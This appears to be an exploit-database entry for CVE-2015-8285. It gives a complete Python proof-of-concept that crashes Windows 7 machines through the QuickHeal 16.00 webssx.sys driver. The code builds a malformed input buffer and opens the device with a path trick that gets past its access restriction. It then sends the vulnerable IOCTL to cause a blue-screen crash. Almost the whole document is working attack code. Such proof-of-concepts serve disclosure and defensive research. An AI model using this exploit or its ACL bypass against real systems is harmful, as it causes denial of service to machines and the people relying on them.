QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability



EKU-ID: 5412 CVE: 2015-8285 OSVDB-ID:
Author: Fitzl Csaba Published: 2016-02-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: QuickHeal webssx.sys driver DOS vulnerability
# Date: 19/02/2016
# Exploit Author: Csaba Fitzl
# Vendor Homepage: http://www.quickheal.co.in/
# Version: 16.00
# Tested on: Win7x86, Win7x64
# CVE : CVE-2015-8285
 
from ctypes import *
from ctypes.wintypes import *
import sys
 
kernel32 = windll.kernel32
ntdll = windll.ntdll
 
#GLOBAL VARIABLES
 
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
 
def alloc_in(base,evil_size):
    """ Allocate input buffer """
    print "[*] Allocating input buffer"
    baseadd   = c_int(base)
    size = c_int(evil_size)
    evil_input = "\x41" * 0x10
    evil_input += "\x42\x01\x42\x42" #to trigger memcpy
    evil_input += "\x42" * (0x130-0x14)
    evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD
    evil_input += "\x43" * (evil_size-len(evil_input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff)
        sys.exit()
    written = c_ulong()
    alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written))
    if alloc == 0:
        print "[-] Error while writing our input buffer memory: %s" %\
            alloc
        sys.exit()
 
if __name__ == '__main__':
    print "[*] webssx BSOD"
     
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    IOCTL_VULN  = 0x830020FC
    DEVICE_NAME   = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver)
    dwReturn      = c_ulong()
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
 
    inputbuffer    = 0x41414141 #memory address of the input buffer
    inputbuffer_size  = 0x1000
    outputbuffer_size = 0x0
    outputbuffer      = 0x20000000
    alloc_in(inputbuffer,inputbuffer_size)
    IoStatusBlock = c_ulong()
    if driver_handle:
        print "[*] Talking to the driver sending vulnerable IOCTL..."
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL_VULN,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )